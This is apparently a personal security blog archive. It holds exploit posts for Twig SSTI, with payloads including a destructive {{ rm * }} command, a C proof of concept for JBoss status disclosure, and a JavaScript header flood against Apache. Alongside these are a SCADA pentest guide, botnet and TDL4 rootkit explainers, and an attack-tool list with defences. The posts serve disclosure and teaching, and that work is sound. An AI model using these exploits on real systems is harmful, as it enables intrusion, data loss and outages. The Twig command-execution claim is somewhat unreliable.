Category

blog

Zero Day Twig PHP template engine

Twig is a modern template engine for PHP, its flexible, fast, and secure template engine for PHP.If you have any exposure to other text-based template languages, such as Smarty, Django, or Jinja, you should feel right at home with Twig. It’s both designer and developer friendly by sticking to PHP’s principles and adding functionality useful for templating environments.

ExploitDB link:

https://www.exploit-db.com/exploits/44102

Well, Twig {Latest version} is affected to Server-Side Template Injection and {{Command execution}}.

Exploit:

Twig <=2.4.4 contain SSTI vulnerability which allow attackers to execute commands within the Parameters, by just using {{COMAND TO EXECUTE}} instead of using the expected values “Normal integer or normal string”, depends on the vulnerable application, which takes deferent params by GET or POST.

1.POC:

Example: by injecting this in a search param http://localhost/search?search_key={{4*4}} >        Output: 16

2. POC:

http://localhost/search?search_key={{4*4}}

http://localhost/search?search_key={{ls}}

OUTPUT: list of files/directories etc….

See the screenshot bellow how its executing the command and printing out the results, this could be also {{ rm * }} which will delete the entire application 🙂

JBoss sensitive information disclosure vulnerability

By requesting the Status File with full param and setting its value to true, Jobss will print a sensitive information such as Memory used/Total Memory / Client IP address. Example: http://127.0.01/status?full=true

ExploitDB Link: 

https://www.exploit-db.com/exploits/44009/

Proof of Concept

//
//  main.c
//  jobss information disclosure POC
//
//  Created by JameelNabbo  on 2/8/18.
//  Website www.jameelnabbo.com
//  LAB     www.uitsec.com
//  CopyRight © 2018 Jameel Nabbo. All rights reserved.
//

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/tcp.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>


int socket_connect(char *host, in_port_t port){
    struct hostent *hp;
    struct sockaddr_in addr;
    int on = 1, sock;
    
    if((hp = gethostbyname(host)) == NULL){
        herror("gethostbyname");
        exit(1);
    }
    bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);
    addr.sin_port = htons(port);
    addr.sin_family = AF_INET;
    sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int));
    
    if(sock == -1){
        perror("setsockopt");
        exit(1);
    }
    
    if(connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1){
        perror("connect");
        exit(1);
        
    }
    return sock;
}

#define BUFFER_SIZE 1024

int main(int argc, char *argv[]){
    int fd;
    char buffer[BUFFER_SIZE];
    
    if(argc < 3){
        fprintf(stderr, "Usage: %s <hostname> <port>\n", argv[0]);
        exit(1);
    }
    
    fd = socket_connect(argv[1], atoi(argv[2]));
    write(fd, "GET /status?full=true\r\n", strlen("GET /status?full=true\r\n")); // write(fd, char[]*, len);
    while(read(fd, buffer, BUFFER_SIZE - 1) != 0){
         fprintf(stderr, "%s", buffer);
    }

    shutdown(fd, SHUT_RDWR);
    close(fd);
    return 0;
}

Solution:
Update to version 4.2.3 or later

How to preform SCADA network SAFE penetration test

SCADA stands for Supervisory Control and Data Acquisition. In very simple terms, SCADA defines a type of control system that is used to control and monitor facilities and industrial infrastructure. Organizations use SCADA systems to automate complex industrial processes, detect and correct problems, and measure trends over time. SCADA systems are used in industries such as water management, building and facility management, traffic management, electric power generation, etc.

SCADA systems support various protocols such as DNP3, ModBus, IEC 60870, BACnet, LonWorks, and EPICS. In this blog post we’ll stick to discussing the ModBus over TCP protocol as it is still widely used in control systems.

ModBus is a serial communication protocol used to communicate with Programmable Logic Controllers (PLCs), which can be used over TCP (port 502). Each device intended to communicate using Modbus is given a unique address. The devices communicate using a master-slave model where only one device (master or slave) can initiate a transaction (called “queries”). A slave is usually the end device on the SCADA network (valve, sensor, or meter reading) which processes information and sends its output to the master.

A ModBus frame consist of target device address (or broadcast address), a function code defining the requested action, data field, and an error checking field. By default, ModBus has no authentication and encryption but can be transported over SSL/TLS to prevent sniffing, spoofing and replay attacks.

 

The diagram above, a corporate and a SCADA network are separated by a firewall. I assume that firewall rules are properly set and no access to the SCADA network is allowed. The three major components involved in SCADA are:

Human Machine Interface/Controller Machine: Usually a Windows workstation known as master used to manage and control PLCs on the network through client software. If compromised, an attacker gains access to everything on your SCADA network.

Programmable Logic Controller (PLC): A physical system connected with a power supply and network enabled with capability to talk over Ethernet networks. It could have an LCD panel showing controller status, operator messages, etc. In recent times we have seen that PLCs are accessible via web browsers, Telnet, SSH – exposing it to all kinds of application and network layer attacks. If compromised, an attacker can manipulate the input/output of your devices and cause serious damage to the organization.

End Devices (Sensor, Valve or Pump): End devices installed at the remote site. They report to PLCs over communication links such as radio, serial connections, Ethernet or direct modems. If compromised, an attacker can compromise the integrity of the environment.

Note: The above components are standard in every SCADA network. You’d probably discover other devices as well such as database servers, serial device interfaces, etc.

 

Recently, SCADA systems have moved from proprietary, closed networks and systems to open systems and TCP/IP networks. This has exposed these networks to the same risks that traditional computer networks face. However, this does not necessarily mean that the approach for security assessment remains the same for SCADA assessments.

From my experiences in conducting SCADA assessments, I’ve noticed that every assessment is different, and on each occasion a unique approach is required based on the system functionality and type of industry it is deployed in. In this article I will share my experience performing a SCADA assessment, and discuss what pen testing approach and tools work best for assessing these highly sensitive systems.

 

How to prepare?

First you have to ask these questions:

  • Are all factory default credentials changed?
  • Are access to PLCs whitelisted to authorized machines only? They should not be reachable from everywhere.
  • Is the SCADA network separated from the rest of the network? If not, try reaching the PLCs from corporate workstations.
  • Is physical access to the SCADA control center restricted?
  • Can you access the internet from the controller machine?
  • Are there any clear text services running on the SCADA network?
  • Does the organization follow a strict password policy?
  • Are the controller machines, workstations and servers patched? Are they running anti-virus software and have application whitelisting enforced?

 

 

Practically, the chances that the organization will have a SCADA test/QA environment are slim. So, we assume that you have to perform an assessment on a live network, taking into account all due care. It is advisable to be prepared before the start of an assessment and ensure that all stakeholders receive communications during each phase of testing. The high-level approach to perform a SCADA assessment includes:

 

Draw a network map and understand the layout:

The primary purpose of studying the network architecture is to logically understand how each component of the SCADA environment relates to each other (beware, this will be highly complex). You should understand what components are involved and how are they segregated, connected or exposed into the wider network. This phase also involves identification of various subnets present within the network. It is important to find out whether the corporate network is separated from the SCADA network or not.

 

Attacking:

Plan your Attack carefully (it’s not a normal IT level- simple error or an out of control action may result in a HUGE RISK).

After you gather enough information on what you need to test and what attacks are applicable. I recommend documenting each of the test cases before attacking the target. This will make you more organized when testing extremely sensitive and fragile systems.

Exploitation stage:

Execute each exploit individually. This will help you detect the root cause in case any device unexpectedly experiences failure conditions. If this happens, you should halt testing and inform the customer. You should attempt exploiting each of the components within the SCADA network i.e. network infrastructure, web interfaces, host operating systems, PLCs, HMI, workstations – just as you would do in a traditional network pen-test.

Tools:

Nessus (But you should control the request timing and preform the scan once for each ip)

smod: ModBus penetration testing framework

plcscan: Python script for scanning PLC devices

NMAP Scripts: NMAP script to scan PLC devices

Wireshark: Network sniffer

mbtget: Perl script to read data from PLC

plcinject: Tool to inject code into PLCs.

 

Conclusion:

SCADA systems are super sensitive and sometimes you may face a SCADA computers that runs Windows XP with 1 G Ram like one of my clients was, so control all your request and monitor the network using WireShark before generating a traffic.

 

Apache 2.2X denial of service HTTP header request

1. Description

Sending a crafted http header request that contain a dump shellcode in Cookie PARAM will result in printing 400 Bad request and the dump code, apache will display a message (Size of a request header field exceeds server limit) and will take sometime to handle the request,
Sending multiple requests will results in denial of service.

2. Proof of Concept

//Our function that send http requests to the target host
function httpGet(target)
{

	var dumpShellCode = "0x30, 0x53, 0x76, 0x99, 0xbc, 0xd7, 0x2, 0x34," 
    + "0x39, 0x5e, 0x7b, 0xc8, 0xbd, 0xfa, 0xff, 0x5b,"
    + "0xa2, 0xe7, 0xa, 0x2d, 0x38, 0x51, 0x40, 0x62, "
    + "0xab, 0xd0, 0xf9, 0x6, 0x2f, 0x4c, 0x6d, 0x89, "
    + "0x14, 0x77, 0x5a, 0xbd, 0x68, 0x93, 0x6e, 0xd0,"
    + "0x1d, 0xd2, 0x5f, 0x6c, 0x59, 0x98, 0xf2, 0xd5,"
    + "0x68, 0x69, 0x50, 0x93, 0xa2, 0x7d, 0xbc, 0x1e,"
    + "0xf, 0x64, 0x3d, 0xaa, 0x8b, 0xe8, 0xc9, 0x25, "
    + "0x78, 0x1b, 0x3e, 0xe1, 0x84, 0x9f, 0x4a, 0x7c," 
    + "0x31, 0xf8, 0x1, 0xae, 0x57, 0x52, 0x77, 0x13, "
    + "0xea, 0x8d, 0x94, 0x17, 0x6e, 0xf9, 0x88, 0x2a,"
    + "0xe3, 0x88, 0xb1, 0x3e, 0x67, 0x4, 0x25, 0xc1, "
    + "0x5c, 0x3f, 0xe2, 0xc5, 0xb0, 0x75, 0x59, 0x36," 
    + "0xf7, 0xea, 0xd7, 0xe4, 0x91, 0x6e, 0x53, 0x2f," 
    + "0x4e, 0x11, 0xf8, 0xdb, 0xaa, 0x85, 0x84, 0x66,"
    + "0x47, 0x1c, 0xf5, 0xe2, 0xc3, 0xa0, 0x81, 0x7d," 
    + "0xa0, 0xe5, 0xc, 0x2f, 0x46, 0x47, 0x72, 0xa4, "
    + "0xa9, 0xce, 0xeb, 0x38, 0x2d, 0x6a, 0x6f, 0xcb,"
    + "0xb2, 0xd5, 0xfc, 0x1f, 0x36, 0x61, 0xd0, 0xf2," 
    + "0xbb, 0xe0, 0x49, 0x56, 0x3f, 0xf6, 0x14, 0x37," 
    + "0xe6, 0xe7, 0xca, 0x2d, 0x18, 0x83, 0x5e, 0xc0," 
    + "0xa5";
	
	//HTTP Request Var 
    var xmlHttp = new XMLHttpRequest();
    xmlHttp.open( "GET", "/", false ); // false for synchronous request
    
    //Now filling the headers information

    //Apache will respond in bad request with the Cookie infomation indicating that apache can't handle the request since its exceed header field limit
    xmlHttp.setRequestHeader("Cookie",dumpShellCode);
    xmlHttp.setRequestHeader("Connection","Keep-alive");
    xmlHttp.setRequestHeader("Host",target);

    //sending the request
    xmlHttp.send( null );
    return xmlHttp.responseText;
}

httpGet("127.0.0.1"); 

3. Solution:

Update to version 2.4.29
http://ftp.itu.edu.tr/Mirror/Apache//httpd/httpd-2.4.29.tar.bz2

4. Download POC:
https://github.com/JameelNabbo/apacheDOS-POC

Learn how cyber criminals use BotNet

The reality is there are millions of botnet affected computers, and other networking devices are out there, yet to identify any is very hard. As for the end-user, everything seems as it should be, and no issues with connecting to the internet, neither problems on the real PC, however, it might be already turned into a zombie also known as a bot.

More and more compromised computers become bots, larger and more powerful it can become the actual Botnet. What’s happening is that each of the zombie computers is now would call home that would be called a C&C Server – Command & Control. C&C is software. However, it would be on a Server. Therefore people refer to it as a C&C Server.

The attacker now would be able to control from the C&C Server all bots and do as he or she would wishes.

Origin of Botnet

A botnet is so powerful that doesn’t necessarily require to be clicked on, but of course you can find those types of botnets too. The reality is that due to its malware type, Botnet can pick up from social networking sites, e-mails, free software downloads, youtube videos, free movie downloads. Similarly to Spyware, it can be obtained from many sources, and once your computer is affected, it can start to spread around to all your devices that might be on the same network as your modified device. For example, if you have a computer, a laptop, an X-Box, and a mobile phone on your home network and one of them is affected, believe me, all your devices will be affected. It can be self-spreader at some point, however, first when you would download a trusted free software from an untrusted source; it might contain a Botnet, that would be hidden under a Trojan type of virus. It might be in another form such as you receive a dodgy e-mail saying that you have been chosen and won x amount of money, so you must click on the link to claim your winning. Again, while you would click on that link, you wouldn’t realize that the Trojan is already installing itself on your computer. Therefore it’s very dangerous and nearly impossible to know if your PC might be already a Zombie. Additionally can be an infected media, that could be a USB Stick, or nowadays even cheap smartphones bought from China can contain Trojans that would spread around to other networking devices and create a robot network.

Relation between the bot and the C&C Server

Imagine that a torrent movie is effected with a Trojan that would contain a botnet, and there are around 2000 – 4000 people are downloading it every day for the next three months, and eventually, those 300.000 computers would become a bot for a certain robot network. However you might think, how on Earth would all those bots connect to a C&C Server? First of all 300K computers to be on the same botnet is an average number. However, Cyber Security Experts have compromised Botnets previously that was large as 30 million zombie computers called BREDOLAB also was running on an alias as OFICLA. This was a Russian botnet. However it has been now compromised, but the reality is that we just don’t know, at least can not be sure how many Botnets are out there.

So back to the victim’s computer, once the botnet would install itself, called a BOT Binary, it would still have to look for a way to connect itself to the C&C Server to communicate with each other and exchange messages. BOT Binary can contain a hardcoded IP Address that would advertise out to the internet so the C&C Server would find it’s bots. However, there are other methods too. Another common way would be that a particular Domain name is written into the BOT Binary that would be advertised out to find it’s master C&C Server. Either way, once the Zombie computer registers itself to the C&C Server, it will become a BOT officially, and the Robot Network Army begins to grow.

Botnet purpose

There are good intentions too for some who creates and uses such Botnets. However, there are very few as we know yet. And what I heard is that in certain countries certain websites are blocked therefore a few communities are using Botnets to access the information that their government wouldn’t allow them to view according to their law.

The reality is that Botnets are used mainly by the bad guys, but to be more specific, large Underworld Cyber Criminal Organizations.

Similarly to Spyware, once your computer becomes a bot, it could forward all sensitive information to its master – C&C Server that might be usernames, passwords, bank account information, however, the primary purpose of the Botnets are deeper than that.

Some people would only build Botnets so that they could sell it to Cyber Criminals, and larger the botnet is more value it has. Of course, there are certain botnets would contain only bots from the US, or from Europe so those would be a little cheaper. However, large Botnets that has bots all over the worlds in different continents are more expensive. A botnet that would contain a C&C Server and 50-100 bots would be sold between $200 – 800 Dollars, however, it all depends on the locations of the bots too. Now taking this further, large Cyber Criminals have multiple botnets, each would contain 10K + zombie computers, and they would letting them out for an hourly fee, or daily fee. Again it would depend on the requirements, as well the quantity of the bots, and their location, but an average price would be for 5000 bots with C&C Server for 1 hour is around $100, or $1000/Day.

When it comes to a botnet of 5000 bots, you have to understand that not all 5000 zombie computers can be used at the same time, as some of them might be turned off. However, I wanted you to understand the pricing when it comes to a marketplace.

Again back to a purpose of the botnets, some organizations would use it to create a DDoS attack (Distributed Denial of Service) against a particular company, perhaps against their competition, or it could be a revenge of an ex-employee. Either way, botnets can be used for attacks, but more and more it used for financial gain, and that is Bitcoin mining.

Bitcoin mining is very popular, however to mine Bitcoin you must have a huge amount of CPU power combined. Therefore large botnets can be a perfect for this exercise. This process is also known as Silent Bitcoin Mining. However, this must be controlled accurately as for Bitcoin mining all the bots would use 100% CPU. Therefore they would control that so the victims wouldn’t realize that silently their computer (bot) is mining Bitcoin.

Who is the behind the C&C Server?

As I mentioned, all the bots are Centralized and controlled by the C&C Server. Due to the centralized coordination to compromise such robot network the source must be identified and caught. The reality is that such Bot-master would always be very careful and would probably only log into the C&C Server if it’s fully Secured. Of course, there is nothing more than guaranteed then a multi-layered network called TOR.

TOR network would allow the BOT master to be anonymous. Therefore it would remove all traces of his or her identity, that would result in the BOT master to be untraceable.

How to Avoid your computer to become a Zombie?

The answer is simple – back to basics! Do not download software from untrusted sources, even if the software is free you must make sure that you are getting it from the trusted source. Downloading torrents like movies, music, or video games, I would recommend you do not do it, as for the potentials for those items might be affected is very high.

E-mails that advertising things that are too good to be true, DO NOT OPEN them, period.

Your Computer should not remember your username and password/s either. Also in case you buy a new laptop, of desktop computer, you must change the passwords. Furthermore, just be careful, and being reasonable with the information presented to you. For example that you have won 1Million Dollar, so all you have to do is to click on the link to claim it if you didn’t even play anywhere, how would you win anything right!? – So again, do not click on anything that you are unsure of, especially for weird programs that would supposedly help you achieving thinks like hack into someone’s Facebook Account and thinks like that.

You must (PURCHASE NOT CRACK) an Antivirus and update it regularly; second is you should install a Firewall even if it’s virtual, still would help you identify if you are affected. Next, to that, you must always run the latest operating system especially if you have Windows. Normally they do upgrades within their software as they have now found a vulnerability within the previous Operating system, therefore upgrade required to patch those vulnerabilities.

How can a Rootkit bypass Windows 7 operating system’s kernel mode, code signing policy?

Microsoft has introduced a number of security features designed to prevent malicious code from running. But attackers are continually finding ways around those protections, an example is a rootkit that can bypass the Windows driver-signing protection.
The functionality is contained in TDL4,TDSS and Alureon Rootkits:

TDSS has been causing serious trouble for users for more than two years, and is an example of a particularly pernicious type of rootkit that infects the master boot record of a PC.

This type of malware often is referred to as a bootkit and can be extremely difficult to remove once it’s detected. The older versions of TDSS–TDL1, TDL2 and TDL3–are detected by most antimalware suites now, but it’s TDL4 that’s the most problematic.

 

TDL4 has a specific function that is designed to bypass a protection in Windows 7 and Windows Vista that requires kernel-level code loaded onto a machine to be signed. The Windows kernel-mode code signing policy is mainly applicable on 64-bit machines.

“Starting with Windows Vista, kernel-mode code signing enforcement is
implemented by a component known as Code Integrity. Code Integrity is a
feature that improves the security of the operating system by verifying
the integrity of a file every time that the image of the file is loaded
into memory. The function of Code Integrity is to detect if an unsigned
driver is being loaded into kernel-mode, or if a system binary file has
been modified by malicious code that may have been run by an
administrator,” Microsoft says in its explanation of the functionality.

The TDL4 rootkit has implemented a feature that evades this protection by changing the boot process on protected machines, according to an analysis of TDL4 by Sunbelt Software. The rootkit accomplishes this by going in and modifying which programs Windows will allow to load an unsigned driver.

“The boot option is changed in memory from the code executed by infected
MBR. The boot option configures value of a config setting named
‘LoadIntegrityCheckPolicy’ that determines the level of validation on
boot programs. The rootkit changes this config setting value to a low
level of validation that effectively allows loading of an unsigned
malicious rootkit dll file. The rootkit dll is kdcom.dll, which is an
infected version normal kdcom.dll that ships with Windows,” Sunbelt’s Chandra Prakash wrote in the TDL4 analysis.

“The rootkit also disables debuggers by NOP’ing debugger activation
functions as described below. This makes reverse engineering this rookit
very difficult! The KdDebuggerInitialize1 function
in infected kdcom.dll called during normal execution of the system
installs the rootkit, which hooks the IRP dispatch functions of miniport
driver below the disk to hide its malicious MBR.”

Joe Johnson of Microsoft presented a talk about Alureon at the Virus Bulletin conference, and discussed the low-level capabilities of the rootkit. The presentation addresses the rootkit’s ability to get the Windows kernel to load a fake version of the legitimate kdcom.dll, but says that the malware does not actually bypass Kernel Patch Protection. In fact, it doesn’t have to because KPP doesn’t inspect all loaded drivers, only the code used by the kernel. Alureon patches the Windows Boot Configuration Data to make the machine think that what’s loading is Windows PE, rather than a normal version of Windows, which prevents code integrity checks from being performed.

Earlier versions of the TDL/TDSS rootkit were used in affiliate marketing programs and black hat SEO campaigns. also were part of botnets and had specific functionality designed to hide other malware programs. An analysis of the first three versions of TDL/TDSS by Kaspersky Lab researchers showed that the rootkit is not only quite advanced, but is under continuous development and refinement by a motivated, talented crew.

“Given that the cybercriminals have put considerable effort into
continuing to support this malware, fixing errors, and inventing various
techniques for bypassing signature-based, heuristic and proactive
detecting, TDSS is capable of penetrating a computer even if an
antivirus solution is installed and running. The fact that bot communication with the C&C is encrypted makes
it significantly more difficult to analyze network packets. An extremely
powerful rootkit component hides both the most important malware
components, and the fact that the computer has been infected. The victim
machine becomes part of a botnet, and will have other malware installed
to it. The cybercriminals profit by selling small botnets and using
blackhat SEO,” Sergey Golavanov and Vyacheslav Rusakov wrote. “As long as a malicious program is profitable, cybercriminals will continue to support and develop it.”

Easy backup android app

I’ve published my Easy backup android app

 

You can back up your Android Phone and prevent your important data to be lost. You can save your space of Phone by back up and removing some Apps which are not frequently used.

The “Easy backup” app offers the easy way to backup your Android Phone. When you need to back up your phone, just open the app and take a backup of the section you want.

 

Download it from google play for free

 

Creating TreeView For MVC 5 Using my open source TreeView component

Here, in this article, we’re going to extend JS Tree from JS to MVC and we’ll render the HTML tags from the database using custom development in the model.

Basically, we’ll create a sample DB that contains main/sub categories with self referencing; then we’ll add support for Razor like (@HTML.TreeView); and after, we’ll render the HTML tags (<ul> <li>) based on our relations in the database.

Let’s get started.

We will proceed with the following sections.

  1. Getting Started
  2. Creating the (Code First) model
  3. Creating TreeView Component
  4. Representing Data

Read the Full Article on Csharp Corner Including the Source files

http://www.c-sharpcorner.com/article/c-treeview-to-mvc-razor-view/

 

Network Attacks

Network Attack Types

There are 2 types of  attacks in general, either they  are passive, meaning information is being screened and monitored ; other attacks are active, which means that the information is altered with the  intent to modify or destroy the data or the network itself.

Without protecting your computer and system, your data might be go under to an attack.

Your networks and data are vulnerable to any of these attacks if you have no protection and security plan:

1. Password-Based Attacks

Password-based access control is a common factor of most operating system and network security plans. This means your access rights to a computer and network resources are determined by your user name and your password.

Older applications do not always protect identity information as it is passed through the network for validation. This might allow an “eavesdropper” to gain access to the network by posing as a valid user.

2. Eavesdropping

In general, the majority of network communications occur in an unsecured or “clear text” format, which allows an attacker who has gained access to data paths in your network to “listen in” or interpret (read) the traffic.

When an attacker is eavesdropping on your communications, it is referred to as “sniffing” or “snooping”. In an enterprise, the ability of an eavesdropper to monitor the network is generally the biggest security problem that administrators face.

Without strong encryption services that are based on cryptography, your data can be read by others easily as it traverses the network.

3. Data Modification

After an attacker has seen and read your data, the next logical step he will most probably take is altering it.

An attacker can modify the data without the knowledge of the sender or receiver. Even if you do not require confidentiality for all communications, you do not want any of your messages to be modified in transit. For example, if you are exchanging purchase requisitions, you do not want the items, amounts, or billing information to be modified.

4. Identity Spoofing (IP Address Spoofing)

Most networks and operating systems use the IP address of a computer to identify a valid entity. In certain cases, it is possible for an IP address to be falsely assumed— identity spoofing. An attacker might also use special programs to construct IP packets that appear to originate from valid addresses inside the corporate intranet.

When an attacker gains access to the network with a valid IP address, he can modify, reroute, or delete your data and conduct other types of attacks.

When an attacker uses valid user account, the attacker acts as the real user. Therefore, if the user has administrator-level rights, the attacker also can create accounts for subsequent access at a later time.

An attacker can do any of the following after gaining access to your network:

• Modify, reroute, or delete your data.

• Obtain lists of valid user and computer names and network information.

• Modify access controls and routing tables.

• Changes server and network configurations.

5. Compromised-Key Attack

A key is a secret code or number that is needed to interpret secured information.

Although obtaining a key is a difficult and resource-intensive process for an attacker, it is possible.

After an attacker obtains a key, that key is referred to as a “compromised key”.

An attacker uses the compromised key to gain access and attack a secured communication channel without the sender or receiver being aware.

With the compromised key, the attacker can decrypt or modify data, and try to use the compromised key to compute additional keys, which might allow the attacker access to other secured communications.

6. Denial-of-Service Attack

The denial-of-service attack prevents normal use of your computer or network by valid users which is different from a password-based attack.

The attacker can do any of the following after gaining access to your network:

• Block the traffic, resulting in a loss of access to the network by authorized users.

• Send invalid data to applications or network services causing unexpected behavior of the applications or services.

• Flood a computer or the entire network with traffic until an overload happens causing shutdown.

• Randomize the attention of your internal Information Systems staff so that they do not see the intrusion immediately, which allows the attacker to make more attacks during the diversion.

7. Man-in-the-Middle Attack

A man-in-the-middle attack occurs when someone between you and the person with whom you are communicating is actively monitoring, capturing, and controlling your communication transparently.

When computers are communicating at low levels of the network layer, the computers might not be able to determine with whom they are exchanging data exactly.

For example, the attacker can re-route a data exchange.

Man-in-the-middle attacks are like someone assuming your identity in order to read your communications. The person on the other end may believe it is you because the attacker might be actively replying as you to keep the exchange going and get the desired information.

This attack is capable of the same damage as an application-layer attack.

8. Application-Layer Attack

An application-layer attack targets application servers by causing a fault in a server’s operating system or applications.

The attacker gains the ability to bypass normal access controls. The attacker takes advantage of this situation, gaining control of your application, system, or network, and can do the following:

• Read, add, delete, or modify your data or operating system.

• Introduce a sniffer program that analyzes your network and gains information that can be used to crash or to corrupt your network and systems.

• Introduce a virus program that uses your computers and software applications to copy viruses throughout your network.

• Disable other security controls to enable future attacks.

• Abnormally terminate your operating systems and data applications.

9. Sniffer Attack

A sniffer is an application or device that can read, monitor, and capture network data exchanges and read network packets.

A sniffer provides a full view of the data inside the packet.

Even If the packets are not encrypted, encapsulated packets can be broken open and read unless they are encrypted and the attacker does not have access to the key.

Using a sniffer, an attacker can do any of the following:

• Read your communications.

• Analyze your network and gain information to cause your network to crash and become corrupted.

Now this was the general interview about network attack types,

Let’s get started about how hackers or cyber criminals executes these attacks.

To simplify things, most of network attackers use a powerful tools to gain access the data on a network:

1.Metasploit Framework – an open source tool for exploit development and penetration testing Metasploit is well known in the security community. Metasploit has exploits for both server and client based attacks; with feature packed communication modules (meterpreter) that make pwning systems fun! The framework now includes Armitage for point and click network exploitation. This is the go to tool if you want to break into a network or computer system.

Defending against Metasploit:

  • Keep all software updated with the latest security patches.
  • Use strong passwords on all systems.
  • Deploy network services with secure configurations.

2.Ettercap – a suite of tools for man in the middle attacks (MITM). Once you have initiated a man in the middle attack with Ettercap use the modules and scripting capabilities to manipulate or inject traffic on the fly. Sniffing data and passwords are just the beginning; inject to exploit FTW!

Defending against Ettercap:

  • Understand that ARP poisoning is not difficult in a typical switched network.
  • Lock down network ports.
  • Use secure switch configurations and NAC if risk is sufficient.

3.sslstrip – using HTTPS makes people feel warm, fuzzy and secure. Using sslstrip this security can be attacked, reducing the connection to an unencrypted HTTP session, whereby all the traffic is readable. Banking details, passwords and emails from your boss all in the clear. Even includes a nifty feature where the favicon on the unencrypted connection is replaced with a padlock just to make the user keep that warm and fuzzy feeling.

Defending against sslstrip:

  • Be aware of the possibility of MITM attacks (arp, proxies / gateway, wireless).
  • Look for sudden protocol changes in browser bar. Not really a technical mitigation!

4.evilgrade – another man in the middle attack. Everyone knows that keeping software updated is the way to stay secure. This little utility fakes the upgrade and provides the user with a not so good update. Can exploit the upgrade functionality on around 63 pieces of software including Opera, Notepad++, VMware, Virtualbox, itunes, quicktime and winamp! It really whips the llamas ass!

Defending against evilgrade:

  • Be aware of the possibility of MITM attacks (arp attacks, proxy / gateway, wireless).
  • Only perform updates to your system or applications on a trusted network.

5.Social Engineer Toolkit – makes creating a social engineered client side attack way too easy. Creates the spear phish, sends the email and serves the malicious exploit. SET is the open source client side attack weapon of choice.

Defending against SET:

  • User awareness training around spear phishing attacks.
  • Strong Email and Web filtering controls.

6.sqlmap – SQL Injection is an attack vector that has been around for over 10 years. Yet it is still the easiest way to get dumps of entire databases of information. Sqlmap is not only a highly accurate tool for detecting sql injection; but also has the capability to dump information from the database and to even launch attacks that can result in operating system shell access on the vulnerable system.

Defending against sqlmap:

  • Filter all input on dynamic websites (secure the web applications).
  • Use mod_proxy or other web based filtering controls to help block malicious injection attacks (not ideal as often able to bypass these web application firewalls (WAF).

7.aircrack-ng – breaking holes in wireless networks for fun and profit. A suite of tools that enables all manner of wireless network attacks.

Defending against aircrack-ng:

  • Never use WEP
  • When using WPA2 with pre-shared keys, ensure passwords are strong (10+ characters non-dictionary based passwords).

8.oclHashcat – Need to get some passwords from the hashes you grabbed with sqlmap? Use this tool to bust them open. Over 48 different hashing algorithms supported. Will use the GPU (if supported) on your graphics card to find those hashes many times faster than your clunky old CPU.

Defending against oclHashcat:

  • Passwords are the weakest link. Enforce password complexity.
  • Protect the hashed passwords.
  • Salt the hashes.

9.ncrack – Brute force network passwords with this tool from Fyodor the creator of Nmap. Passwords are the weakest link and Ncrack makes it easy to brute force passwords for RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, and telnet.

Defending against ncrack:

  • Use strong passwords everywhere.
  • Implement time based lockouts on network service password failures.

10.Cain and Abel – Cracking passwords, sniffing VOIP and Man in the Middle (MITM) attacks against RDP are just a few examples of the many features of this Windows only tool.

Defending against Cain and Abel:

  • Be aware of the possibility of MITM attacks (arp attacks, untrusted proxy / gateway, wireless).
  • Use strong passwords everywhere.

11.Tor – push your traffic through this onion network that is designed to provide anonymity to the user. Note your traffic from the exit node is not encrypted or secured. Make sure you understand what it does before using it, Tor provides anonymity not encrypted communication.